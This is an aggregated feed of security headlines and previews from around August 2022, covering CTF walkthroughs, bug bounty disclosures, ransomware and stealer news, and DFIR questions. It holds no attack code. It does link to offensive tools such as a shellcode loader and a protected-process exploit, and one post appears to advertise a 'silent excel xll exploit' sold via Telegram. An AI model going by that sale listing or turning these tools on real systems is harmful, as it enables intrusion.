    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on Medium »
    HackTheBox — Redeemer
    Redeemer is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    How To Detect Remote Desktop Protocol tunneling over SSH
    During some testing on my Windows VPS, I was checking out the OpenSSH server feature in Windows. This reminded me about the times our Red… Continue reading on Medium »
    SOCFortress Attack Simulator
    Using Caldera to test your EDR Agent Continue reading on Medium »
  • Open

    SecWiki News 2022-08-03 Review
    2022 H1 Blockchain Security and Anti-Money-Laundering Analysis Report by ourren; Building an enterprise-grade data governance system from 0 to 1 by ourren; On the necessity and feasibility of an international cyberattack attribution mechanism by ourren; A new stage of cloud computing security: discovering and governing risk in the cloud by ourren; A brief analysis of VMess traffic and the 强网杯 2022 challenge "谍影重重" by ourren. For more of the latest articles, visit SecWiki
  • Open

    XSS in redditmedia.com can compromise data of reddit.com
    Reddit disclosed a bug submitted by keer0k: https://hackerone.com/reports/862882
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shorteners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    FreeBuf Morning Report | German semiconductor manufacturer hit by ransomware; Microsoft announces new external attack surface audit tool
    German power electronics manufacturer Semikron disclosed that it was hit by a ransomware attack that even encrypted the company's network.
    How malware disguises itself: this report has the answers
    The key to designing and deploying malware is disguising it as a legitimate app, tricking users into downloading and running malicious files and thereby infecting target devices and systems.
    Well-known semiconductor manufacturer Semikron hit by ransomware attack
    German semiconductor manufacturer Semikron disclosed that it suffered a ransomware attack that encrypted part of the company's network.
  • Open

    PART 3: How I Met Your Beacon - Brute Ratel - @MDSecLabs
    submitted by /u/dmchell [link] [comments]

  • Open

    Creating Processes Using System Calls
    submitted by /u/sanitybit [link] [comments]
    Using process creation properties to catch evasion techniques
    submitted by /u/sanitybit [link] [comments]
    NIST SIKE finalist for quantum safe crypto has been broken by a very efficient classical computer attack.
    submitted by /u/ScottContini [link] [comments]
    All your PTY/TTY belongs to us
    submitted by /u/Background-Degree-50 [link] [comments]
  • Open

    Vulnerability management policies considered harmful to shipping secure software
    Article URL: https://haydock.substack.com/p/security-release-criteria Comments URL: https://news.ycombinator.com/item?id=32324806 Points: 3 # Comments: 0
    Hacker Probably Targeting Auth Option Update Vulnerability in Make's WP Plugin
    Article URL: https://www.pluginvulnerabilities.com/2022/08/02/hacker-probably-targeting-this-authenticated-option-update-vulnerability-in-makes-wordpress-plugin/ Comments URL: https://news.ycombinator.com/item?id=32322219 Points: 1 # Comments: 0
    Rsync client-side arbitrary file write vulnerability
    Article URL: https://www.openwall.com/lists/oss-security/2022/08/02/1 Comments URL: https://news.ycombinator.com/item?id=32318155 Points: 128 # Comments: 36
  • Open

    Web Cache Poisoning via an Unkeyed Input
    Hello, I'm SNISS and today I'm going to talk about a vulnerability that has been found a lot recently, called Web Cache Poisoning Continue reading on Medium »
    Monthly Update: July 2022
    Dear community. Continue reading on Medium »
    Stored XSS to Account Takeover : Going beyond document.cookie
    Stealing Session Information From IndexedDB Continue reading on Medium »
    How I cleared(hacked) all my traffic cases with just ₹100- BugBounty [BangaloreTrafficPolice]
    Note:- It's just a bug report to the Paytm and BangaloreTrafficPolice, KarnatakaOne websites, with 5-star severity, hope they fix nothing… Continue reading on Medium »
    Why Every Organization Should have a Bug Bounty Program
    Introduction Continue reading on Medium »
    Moonbeam team releases urgent security patch for integer truncation bug
    On Monday, June 27, 2022, Moonriver and Moonbeam received an urgent update via runtime 1606 to resolve a… Continue reading on Medium »
    Multiple bugs in one program leads to 1500€
    Hi, today I‘m going to talk about three basic vulnerabilities that I discovered in the same program and were rewarded with 1500€. Continue reading on InfoSec Write-ups »
    How I earned 500$ by uploading a file: write-up of one of my first bug bounty
    This is the write-up of one of the first vulnerabilities that I found 3 years ago. It’s a little late, but better late than never, right? Continue reading on Medium »
    KLEX FINANCE TESTNET QUICK GUIDE
    KLEX is an implementation of the Balancer v2 Protocol on Klaytn. Continue reading on Medium »
  • Open

    [WriteUp] OhSINT — TryHackMe
    Beginner-friendly OSINT room to sharpen your skills Continue reading on Medium »
    Threat Intelligence Tools — TryHackme Walkthrough
    Explore different OSINT tools used to conduct security threat assessments and investigations. Continue reading on Medium »
    War in Ukraine / August 1
    Day 160: An important moment for the Ukrainian counteroffensive Continue reading on Medium »
    Is OSINT legal or ethical?
    In the US and the UK, OSINT is legal, but security teams need to stay within a clearly defined framework, which is agreed with their… Continue reading on Medium »
  • Open

    Can kernel debugging be done between different processor architectures?
    Sorry if this sounds like a noob question. When it comes to Kernel Debugging, HackSys Team's HEVD seems to be the go-to for practice. In write-ups, we see that we need to set up 2 VMs and set up baud rate, etc. Essentially, trying to replicate the hard-wired debugging across machines with Ethernet cables that was performed before VMs came along. The baud rate is matched between windbg running on both VMs and a Pipe is set up between both VMs. Can this be done between different processor architectures? Ex: I have a Win10 VM on an x86_64 arch machine (Debuggee) and another Win10 VM on a MacBook Pro (Debugger). Since the MacBook uses ARM arch, the debugger will obviously show ARM instructions (if I were to debug an application that's already on the MacBook). Now, is there a way I can debug the x86_64 programs on the Debuggee VM from my ARM VM? If I'm not making sense, let me know. I'm pretty new to this and I'm trying to learn. submitted by /u/ScrotumHair [link] [comments]
  • Open

    DFIR career trajectory and goals - what would you do differently if you could go back in time?
    I’m new to the DFIR field, and I’m wondering what some of you, that have been in the field for years, would do if you could go back in time? What are some things to think about or consider as you go forward in your career? I’m young and inexperienced, so it’d be cool to hear about any tips or advice you might have for a newcomer in this field submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-08-02 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com
    Reddit disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1567186 - Bounty: $10000
    Found Origin IP's lead to access to gitlab
    GitLab disclosed a bug submitted by m-narayanan: https://hackerone.com/reports/1637577
  • Open

    Selected session videos from the Zero Trust Security Forum now online | CIS Conference Summer Edition
    For the CIS Conference Summer Edition, FreeBuf invited several industry leaders for an in-depth discussion and outlook on zero trust security, hoping to give enterprises and users some reference and inspiration on the topic.
    FreeBuf Morning Report | Experts say the Twitter leak is bad; QQ Music begins showing users' IP location
    The news that data on 5.4 million Twitter users is for sale on the dark web may shock many, but it may be only the tip of the iceberg.
    Zero trust has been hot for over a decade, so why can't it be put into practice?
    For enterprise customers, what is the core driver for fully implementing zero trust, and what is the future development path of zero trust technology?
    Notes from a real-world engagement: from CAPTCHA bypass to unauthorized access
    A write-up that was 90% luck and 10% skill.
    BlackCat claims responsibility for the Creos attack
    The ALPHV ransomware gang, also known as BlackCat, has claimed responsibility for the cyberattack on Luxembourg's Creos.
    More than 3,200 apps leaked Twitter API keys
    Cybersecurity researchers found a set of unusual mobile apps that expose Twitter API keys to the public.
    Raccoon malware upgraded; password theft to become far more efficient
    Security experts at Zscaler have published an analysis of a new variant of the Raccoon Stealer malware.
    Research finds attackers can abuse Chromium browser bookmark sync to exfiltrate data
    Bookmarks can be abused to siphon large amounts of stolen data out of enterprise environments, or to deploy attack tools and malicious payloads into them with little chance of detection.
    Analysis of the latest Raccoon Stealer v2 info-stealer sample
    Raccoon is an information-stealing malware capable of stealing private data such as passwords, cookies, and autofill data from browsers.
  • Open

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »

    Threat analysis visualization?
    Hi peeps, I'm a SOC analyst and I was wondering if there's a software to visualize threats and incidents. I wanna create something like a timeline and such. I know I could just use visio or any other software like it but I was wondering if there's something specific for InfoSec. Thanks ;) submitted by /u/MenaHabib_ [link] [comments]

    HackTheBox — Dancing
    Dancing is a boot2root machine on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »

    NimicStack: Call Stack Spoofing in Nim
    submitted by /u/DarkGrejuva [link] [comments]

    Movies and Series
    Dunno about speeds or even if it's been posted before... http://88.99.99.152/ submitted by /u/DodgyguyNZL [link] [comments]


    The Story of an Extortion Case
    I am using fake names in this story. The story is that there was this person that Zachery was talking to on a dating site. He was sadly… Continue reading on Medium »
    War in Ukraine / July 29–31
    Day 159: The food deal seems to have worked Continue reading on Medium »
    TryHackMe | WebOSINT Writeup
    TryHackMe’s WebOSINT room, finding information that no longer exists. Continue reading on Medium »

    using wget terminal command to download your needed stuff/download stuff recursively
    ########### brought to you by the guy who knows a little bit about linux = what is wget? : it is a GNU computer program that retrieves content from web servers (long story short, a free software terminal program that can batch download websites and what people post on this sub.) = why do i need it? : sometimes it's annoying to click thousands of links to download files instead of just using a free software solution that will crawl and download everything for you. === how do i install wget? = windows : windows now has a builtin package manager (thanks linux) winget install GnuWin32.Wget or install choco package manager then do this choco install wget = linux: easy mode sudo pacman -S wget sudo dnf install wget sudo apt install wget (i think you dont need to do this since it maybe a…
    Windows comedy ISOs!
    submitted by /u/Plastic_Preparation1 [link] [comments]
    maths lecture notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

    Changing region settings in Caine 12.4
    Hello Everyone, I'm using Caine 12.4 for image acquisition because it defaults to read only and, well I like it. Everything except for the fact that the region settings are set to Italian by default. It's a small thing, but I'd, at minimum, like to see the dates in English and prefer if the region was set to Canada, and the time zone to mountain time (Whitehorse, Yukon). I can do this manually after booting, but I've found the only way to get it to work properly is to set the time zone to mountain, set the region to Canada, and delete Italian from the language list (Without deleting the language the dates still display in Italian). So I'm wondering what I would need to edit in the iso to switch the region and timezone defaults, or at the very least remove Italian from the installed languages. If anyone can help me out with this it would be greatly appreciated. submitted by /u/thenebular [link] [comments]
    Upcoming skills test
    Hello all, please delete if not allowed. I have an interview and skills test at the end of the month for an analyst position with an ICAC unit for a law enforcement agency. I am fresh out of college and although I did take some digital forensic courses, the majority of my course work had a heavy emphasis on physical evidence. The job duties of the position are primarily to conduct research and perform field previews when necessary. I have no information on what the skills test will contain. What would you recommend I try to study before taking the test? This is an entry level position, so the test will likely not contain much material on complex techniques. Any help would be greatly appreciated. submitted by /u/No-Librarian4750 [link] [comments]
    MemProcFS - This Changes Everything
    Good morning, It’s time for a new 13Cubed episode! This one covers a tool that I truly believe is revolutionary. Imagine being able to "mount" memory as if it were a disk image. With a single command, MemProcFS will create a virtual file system representing the processes, file handles, registry, $MFT, and more. The tool can be executed against a memory dump, or run against memory on a live system. This is a game changer for memory forensics! Episode: https://www.youtube.com/watch?v=hjWVUrf7Obk Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]

    SSTImap - Automatic SSTI detection tool with interactive interface
    SSTImap was developed as a new SSTI detection tool based on Tplmap. The main feature of this tool and a key difference with Tplmap is the interactive mode, which enhances detection and exploitation. Also, payload for Smarty was changed to work without {{php}}{{/php}} tag, which was disabled by default in Smarty 3.0. New payloads for other template engines will be developed. https://github.com/vladko312/SSTImap submitted by /u/vladko312 [link] [comments]

    Threat Modeling Field Guide
    submitted by /u/sanitybit [link] [comments]
    SSTImap - Automatic SSTI detection tool with interactive interface
    submitted by /u/vladko312 [link] [comments]
    A Detailed Analysis of the RedLine Stealer
    submitted by /u/CyberMasterV [link] [comments]

    Most Common Attacks in android Apps | InsecureShop
    InsecureShop is an Android application written in Kotlin that is designed to be intentionally vulnerable. It is a great asset for… Continue reading on Medium »
    How I get Full Account Takeover via stealing action’s login form | XSS
    Today I will explain How I get Full Account Takeover via stealing the action of the login form when you have XSS on the login page. Continue reading on Medium »
    PORTSWIGGER - Command Injection Vulnerabilities LAB Solutions
    Hi friends, today I'll talk about the Command Injection vulnerability and explain the solutions to the questions on PortSwigger. Continue reading on Medium »
    July Monthly Update
    July went by so fast! While we have so much to share, be sure to believe that we have much more planned for the next couple months. If you… Continue reading on Medium »
    ‘PTN’ infosec monthly #2 — InfoSec Updates
    Namaste everyone, Welcome to our ‘PTN’ infosec monthly #2 and we are back with the second newsletter with PTN Anniversary special updates… Continue reading on Pentester Nepal »
    How I earned $10,000 within the last 7 months — 17y/o Edition
    you know that I mostly earn bounties in Cryptocurrencies and this leads to the answer → I mostly hunt on XXXXXXXXXXXX Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
    Responder Starting Point HacktheBox Walkthrough
    Responder Starting Point is a very good challenge by HackTheBox. In this article we are going to exploit it. Continue reading on Medium »
    Intigriti’s July 0722 XSS Challenge Writeup
    I. Overview Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-1
    Here are some of the amazing interview questions that we came across and wanted to share with you. Continue reading on Medium »

    X Stock Seems Boring but has Big Upside Potential | Utradea
    Based on the overall X stock forecast of $32.62 per share (derived from P/E & EPS, and comparable valuations), and the current price of X… Continue reading on Medium »

    Faraday – open-source Vulnerability Management
    Article URL: https://faradaysec.com/community-v4/ Comments URL: https://news.ycombinator.com/item?id=32309146 Points: 4 # Comments: 2

    LastPass vs Bitwarden
    Been using LastPass for years. I've been happy until my Windows 10 work laptop had an issue. The LastPass browser plugin sucks up 100% CPU. Never had this issue before. Switched to Bitwarden with no issues. Questions Has anyone else seen this issue? Which password manager would you recommend? Any issues with Bitwarden security? ​ Note: I find Bitwarden a bit clunky for day to day use. Not as slick as LastPass. Other than that I don't have a problem with it. And I kinda like the desktop app. Thanks! submitted by /u/damienhull [link] [comments]
    How do you deal with the identity crisis caused by cybersecurity?
    Well I [M27] have been interested in security since high school, and I have been working in the field for 4 years now between engineering and IR. I'm kinda good with what I do, had my OSCP 3 years ago, with a good background in many security fields, but now and then I feel that I want to get out of my comfort zone. I find people in the industry sharing everything on LinkedIn, doing podcasts that nobody listens to and posting infosec memes on their Twitter where they have 7 followers, as if anybody is interested. I'm not sure if it's a social issue but I rarely talk about cybersecurity on my social media or with friends and prefer sharing memes that are not related to cybersecurity; over time I feel that I have 2 personalities. I feel sad sometimes that I hate showing off and there are people who like showing off because they got a 4-letter business certificate with no technical knowledge. Anybody feel the same? submitted by /u/xoutisx [link] [comments]
    Will having secret clearance take me far in Security if I don’t intend to work for the govt. long term?
    I’m more interested in working for bigger companies doing security than I am for the government- but most important to me is opening doors. If doing cybersecurity for the govt. for a few years gives me plenty of opportunities for working in other companies, I don’t mind doing it. I have two job offers and one is a threat analyst for a bigger company that’s well known in this industry, and the other is a security analyst for a government contractor and I can get a secret clearance. Haven’t decided which one will be a bigger step for my career. My end goal is to become a security engineer. One of these will be my first cybersecurity job. submitted by /u/Good-Turnip-8963 [link] [comments]

    SecWiki News 2022-08-01 Review
    Basic anti-virus evasion techniques on Windows by SecIN Community; SecWiki Weekly (Issue 439) by ourren. For more of the latest articles, visit SecWiki

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »

    Insecure TLS Configuration #3530
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1639423
    delete the subaccount from the user id
    Showmax disclosed a bug submitted by qualwin38000: https://hackerone.com/reports/1646340 - Bounty: $700
    Insecure use of shell.openExternal() in Rocket.Chat Desktop App leading to RCE
    Rocket.Chat disclosed a bug submitted by baltpeter: https://hackerone.com/reports/924151
    Race condition on https://judge.me/people
    Judge.me disclosed a bug submitted by netboom: https://hackerone.com/reports/1566017 - Bounty: $250

    HackTheBox — Fawn
    Fawn is a boot2root CTF on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    PortSwigger Web Security Academy Lab: SQL injection Continue reading on Bilişim Hareketi »
    Kerberos
    Hey friends, it is the second article in my Active Directory Theory and Exploitation series. Today, I would like to talk about Kerberos… Continue reading on Medium »

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »

    FreeBuf Morning Report | National cyber law enforcement achieved notable results in the first half of the year; U.S. House of Representatives passes the Ransomware Act
    In the first half of 2022, the national cyberspace administration system continued to intensify cyber law enforcement, standardize enforcement practices, and resolutely investigate and punish all kinds of illegal and non-compliant cases in accordance with the law, achieving notable results.
    MBDA suspected of being breached; attackers claim to have obtained confidential data
    An attack group calling itself Adrastea claims to have breached the multinational missile manufacturer MBDA.
    A vast network of 11,000 fake investment websites has "set its sights" on Europe
    Researchers discovered a huge network made up of more than 11,000 domains that is promoting fake investment schemes to European users.
    Dahua cameras have a security vulnerability, which has now been fixed
    Through this vulnerability, an attacker could obtain the highest privileges and unrestricted access to affected devices, including live viewing and replay of camera video.
    17 DawDropper banking malware apps found on the Google Play Store
    These apps included document scanners, VPN services, QR code readers and call recorders, and together carried four banking trojan families: Octo, Hydra, Ermac and TeaBot.
    VeinMind: a complete record of using a container security detection tool
    Recently, while surveying open-source container security tools at home and abroad, I found many excellent projects; foreign projects such as trivy and anchor have done an outstanding job in vulnerability detection, while there are few domestic projects and even fewer tools focused on non-vulnerability detection, so for an open-source container… named 问脉 (VeinMind)

    should i delete this since the code may not actually be used in production
    submitted by /u/ParkingMobile2095 [link] [comments]

    Virtual Images for Testing
    Many within the DFIR community make use of virtual systems for testing...for detonating malware, trying things within a "safe", isolated environment, etc. However, sometimes it can be tough to get hold of suitable images for creating that testing environment. I've collected a bunch of links to VirtualBox VMs for Windows, but I cannot attest to all of them actually working. But, if you'd like to try any of them, here they are...
    MS Edge developer virtual machines (Win7 - 10, limited time)
    Windows 7 Image, reports no activation needed
    Win95 virtual machine
    Various MS virtual machines (MS-DOS, Windows, etc.)
    Windows 11 Dev Environment (eval)
    Use Disk2vhd to create a virtual machine from an existing installation
    ReactOS - clone of Windows 5.2 (XP/2003)
    There's no shortage of Linux and Unix variant OS VMs available. For example, you can find Solaris VMs here. For MacOS Big Sur, you can try this site. Back in 1994 and '95, while I was in graduate school, I went to Fry's Electronics in Sunnyvale (across the street from a store called "Weird Stuff") and purchased a copy of OS/2 2.1. I did that because the box came with a $15 coupon for the impending OS/2 Warp 3.0. If you'd like to give the OS/2 Warp OS a shot, you can try this v4.52 download, or try this site for other versions of OS/2. If you're a fan of CommodoreOS, you can give this site a shot. For AmigaOS, try here, or here. How about Plan9?
    General Download Sites
    OSBoxes
    SysProbs
    VirtualBoxes
    Hope that helps!

    The underlying rules of bug bounty
    3 entities, 3 jobs. The bug bounty industry is mainly composed of three big entities, each with a specific job. Programs: the need. Companies who want to test their security. Besides triage, companies have a lot to do: create well-detailed policies to ensure that hunters will focus on the most interesting issues; prepare the internal workflow of all concerned teams to handle the flow of reports; estimate the severity of every report and reward it accordingly; and finally, fix the bugs.


    Top 10 most rated OSINT Tools on Github
    We’re a little fed up with OSINT tools claiming they’re the best. So, we spent some time looking at some hard facts from Github. After… Continue reading on Medium »
    Officer_CIA X MaxWayld: Content Overview
    Greetings dear readers! Today I present to your attention an article written by my good friend Max — in it he made a review of more than a… Continue reading on Medium »
    The Art of Angle In GEO-OSINT Investigation
    Hey, my name is Satyam Jaiswal and in this blog, I want to share how sometimes in the OSINT investigation especially in GEO OSINT, the idea Continue reading on Medium »
    How to detect and neutralize a network of malicious sites? (case study)
    Detection, comprehensive analysis and elimination of malicious, spam and phishing pages, URLs, links and sites. Continue reading on KR. LABORATORIES IT BLOG »
    SPY NEWS: 2022 — Week 30
    Summary of the espionage-related news stories for the Week 30 (July 24–30) of 2022. Continue reading on Medium »

    intigriti Challenge 0722 by Vroemy
    Another awesome XSS challenge from Intigriti. Personally, I learn a lot trying to solve these monthly challenges by Intigriti. The… Continue reading on Medium »
    How to Exploit CSRF (Cross Site Request Forgery) in Web Applications — Pentester Academy Challenge
    Introduction Continue reading on Medium »
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    Vulnerabilities Scan
    Vulnerabilities Scan: 15000+PoCs; 20 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hi hi, we meet again. This time the author will try to explain sensitive data exposure and how we can… Continue reading on Medium »
    Do you need to be a programming pro to hack?
    Hacking is always presented in the media by thousands of lines of code flashing on a person’s laptop. Is this reality? Continue reading on Medium »
    Buffer Overflow: Understanding CPU Registers
    Hello Security folks, In previous article, we came to know about Stack, How Application memory works and Memory Addresses. In this article… Continue reading on Medium »
    Crocodile Starting Point HackTheBox Challenge Walkthrough.
    Crocodile is really awesome challenge by HackTheBox to practice skills related to Hacking. In today’s writeup we are going to solve this… Continue reading on Medium »

    What is this site doing? [blackscreen]
    This site starts some service worker and seems to download/upload something just by loading what is just literally a black screen. It also created 66kb worth of cookies which I had to delete. Any insight on what it might be trying to do? This is one of the first results in google if you search for a black screen. The idea of searching for a black screen or any color is just to have a solid background for whatever reason like taking screenshots, but I think it's trying to do something fishy. submitted by /u/PlatformKnuckles [link] [comments]
    What is WMAgent?
    I found this CVE-2022-34558 which states that a WMAgent is vulnerable. I have searched the internet but I didn't understand much. submitted by /u/Chroll-On [link] [comments]
    Q: Security risk of a permanent Fritzbox-VPN connection with my parents network?
    Hello everyone, I started in the last months to educate myself more and more about privacy and cyber security. I have also started to host services and data locally. I also started to improve my network infrastructure through various services (pi-hole... etc.). Now I have also started the mission to educate my parents about this and make them aware of their digital footprint and threats. I also had the idea to use the Fritzbox VPN to connect the networks and make elements of my network infrastructure accessible to them so they do not need to build up and maintain a redundant infrastructure. Now I would like to avoid securing myself first and then exposing myself to unmanageable/unknown risks with such a connection to my parents' network. I would love to understand the risk of network-wide threats better (e.g. malware that affects the whole network across the VPN?). Moreover, I cannot evaluate the security of the Fritzbox VPN (google results say it's ok?) (Unfortunately, their Fritzbox is a bit older and will not support Wireguard). The alternative is to simply set up easy things such as a pihole on a raspi that I can prepare and easily set up, but not go with the "permanent connection" solution. I would love to learn from you guys how big the risk of such network-wide threats is and how you would rate the Fritzbox VPN. Thanks! submitted by /u/DonSiffo [link] [comments]
    Roadmap for getting into cyber forensics?
    I’m a junior penetration tester. Currently looking to pivot into a different area as I’m realizing that pentesting isn’t for me. My initial thought was to switch to something less technical, but before I make that change I wanted to give forensics some consideration as I’ve always thought it would be cool to explore that. I know nothing about it though so I wanted to see if there are any of y’all out there that currently work in cyber forensics and ask if A) someone switching from penetration testing would feel comfortable in a forensics role and if a pentesting background would lead to success in forensics and B) any information on how to get started. What resources to start looking at, certifications to explore, jobs to consider that would lead to a smooth transition from pentesting into forensics, etc. submitted by /u/anon2user [link] [comments]
    Lightning Port HDMI Dongle (Amazon)
    I was considering buying an HDMI dongle from Amazon instead of the original Apple one to save a few bucks. I’m thinking this could contain some sort of implant but I'm trying to understand if there is a way for me to check this before putting it on my device. Are others experienced with how to trace if this is stealing my data? submitted by /u/jeepynomad [link] [comments]

    Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138
    Article URL: https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/ Comments URL: https://news.ycombinator.com/item?id=32298575 Points: 1 # Comments: 0

    Studying data security technology and the market
    Security vendors' level of understanding of data security still needs to catch up with the national level; they need to increase investment and go a step further.
    What is it like to fight on home turf in an attack-and-defense exercise? (social engineering + close-access)
    A dream red team operation: playing at home, with rich results.

    SecWiki News 2022-07-31 Review
    Overview of security knowledge graph technology by ourren; Malware Analysis Tools 2022 by ourren. For more of the latest articles, visit SecWiki

    Men of The Auxiliary Division of the Royal Irish Constabulary, listed alphabetically
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    tools
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Pictures of Adventure Time show
    Highly NSFW comics https://drive.google.com/drive/mobile/folders/0B42kNriZcp4cLWlwSDlQYXdIOFE?usp=sharing&resourcekey=0-MrZHfmBcSPlHVIKzTBJIyQ submitted by /u/RainyAbrar [link] [comments]

    How can I determine whether artefacts in Safari are local or synced?
    If they are synced artefacts - what device identifier is available? submitted by /u/zoomjua [link] [comments]
    Digital Forensic Introduction Video
    In this video, I have covered the following content: 1) What is Cyber Crime? 2) What are the different types of cybercrime? 3) Forensics Investigation Procedure 4) Effective Strategy for CISOs for Forensics Requirements 5) Top tools 6) Good Evidence Principles 7) What is "Chain of Custody?" https://www.youtube.com/watch?v=u2zgEFm5RHQ submitted by /u/prabhnair1 [link] [comments]

    EDR Blindness, pt II
    As a follow-on to my earlier blog post, I've seen a few more posts and comments regarding EDR 'bypass' and blinding/avoiding EDR tools, and to be honest, my earlier post stands. However, I wanted to add some additional thoughts...for example, when considering EDR, consider the technology, product, and service in light of not just the threat landscape, but also the other telemetry you have available.  This uberAgent article was very interesting, in particular the following statement: “DLL sideloading attack is the most successful attack as most EDRs fail to detect, let alone block it.” The simple fact is, EDR wasn't designed to detect DLL side loading, so this is tantamount to saying, "hey, I just purchased this brand new car, and it doesn't fly, nor does it drive underwater...".  Joe Stock…

    Weekend Wrap-up of Infosec News
    submitted by /u/SuaveHobo [link] [comments]
    CQ, a code security scanner
    submitted by /u/0xdea [link] [comments]

    Open S3 Bucket Accessible by any Aws User
    GoCD disclosed a bug submitted by khalidou: https://hackerone.com/reports/1654145

    HackTheBox — Meow
    Meow is a boot2root CTF on HackTheBox. It has the difficulty “very easy” and is part of the Tier 0 starting point machines. Continue reading on Medium »

    Silent excel xll exploit - telegram : mave12x
    submitted by /u/SarahEliset [link] [comments]


    Abwaab Data Leak
    Over 2,26 #million users #data leaked from Abwaab Jordan Platform, Continue reading on Medium »
    Zero-day XSS
    Hello Cyber Security Enthusiast. I’m back again with another article of XSS. In this article, I’ll explain how I got an unexpected XSS and… Continue reading on InfoSec Write-ups »
    How I Earned €150 in 2 Minutes | HTML injection in email
    Introduction : Continue reading on Medium »
    Authentication Bypass
    Hello folks, Continue reading on Medium »
    Cross-function re-entrancy in the wild
    After many catastrophic, tragic incidents in the past, I believe that everyone would have heard about this so-called “re-entrancy” attack… Continue reading on Medium »
    Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
    Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it. Continue reading on Medium »

    Pokemon-Shellcode-Loader: Tired of looking at hex all day and popping '\x41's? Rather look at Lugia/Charmander? I have the solution for you.
    submitted by /u/Techryptic [link] [comments]
    Running Exploit As Protected Process Ligh From Userland
    submitted by /u/tasty-pepperoni [link] [comments]
    CVE-2022-36123 - Linux kernel <5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service, or gain privileges.
    submitted by /u/docker-osx [link] [comments]

    Running Exploit As Protected Process Ligh From Userland
    A tool called RunAsWinTcb uses a userland exploit to run a DLL with the protection of Protected Process Light (WinTcb-Light signer type). Blog about the vulnerability and tool: https://tastypepperoni.medium.com/running-exploit-as-protected-process-ligh-from-userland-f4c7dfe63387 The tool: https://github.com/tastypepperoni/RunAsWinTcb submitted by /u/tasty-pepperoni [link] [comments]
    Pokémon Shellcode Loader
    submitted by /u/Techryptic [link] [comments]

    A Newbie need some help with patch analysis
    Hi there, a year ago I started my career in AppSec as a penetration tester. But what I want to learn now is patch analysis. Basically, when a CVE gets released the vendor releases a patch. But the issue I am facing is finding the patch itself. Yes, GitHub is the right place to look, but there are so many commits out there; how do you identify the right commit to analyse the patch so that you can develop your own exploit or maybe find a bypass? Any help is appreciated. submitted by /u/wh0am1root [link] [comments]

    x-ways editing event log definition file.
    Question for anyone that uses X-Ways. I am trying to edit the exvt definition file that parses out Windows events in X-Ways. I want to add some other events to it. However, when I edit the text document that holds the information for it and save it afterwards, there is no change. I even tried to process the case again; no change. Anyone have any ideas on this? submitted by /u/divinealpha12 [link] [comments]
    Transition from Government to Private Sector
    I am looking to transition to private sector after 8 years of digital forensics in a law enforcement capacity. Are there any hiring managers out there that can give advice on what you look for or possibly provide resume critique? submitted by /u/outdorksman [link] [comments]

    Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
    Article URL: https://derekabdine.com/blog/2022-arris-advisory.html Comments URL: https://news.ycombinator.com/item?id=32288020 Points: 77 # Comments: 22

    SecWiki News 2022-07-30 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    HacktheBox [Late]
    Full Nmap TCP scan shows port 80 and 22 open: Continue reading on Medium »
    RED TEAM ASSESSMENT SERVICE IN DELHI
    Definition Continue reading on Medium »

    Cross Site Scripting Vulnerability (XSS)
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1650210
    Open redirection at https://smartreports.mtncameroon.net
    MTN Group disclosed a bug submitted by vulnera: https://hackerone.com/reports/1530396

    To the pentesters, what's in your kit bag?
    Found the same thread from 8 years ago and am wondering about new answers and the current kit. So to the pentesters, what do you carry in your bag for pentests at the customer's location? submitted by /u/namelessOnReddit_ [link] [comments]
    Is this attack possible or just a scare tactic ?
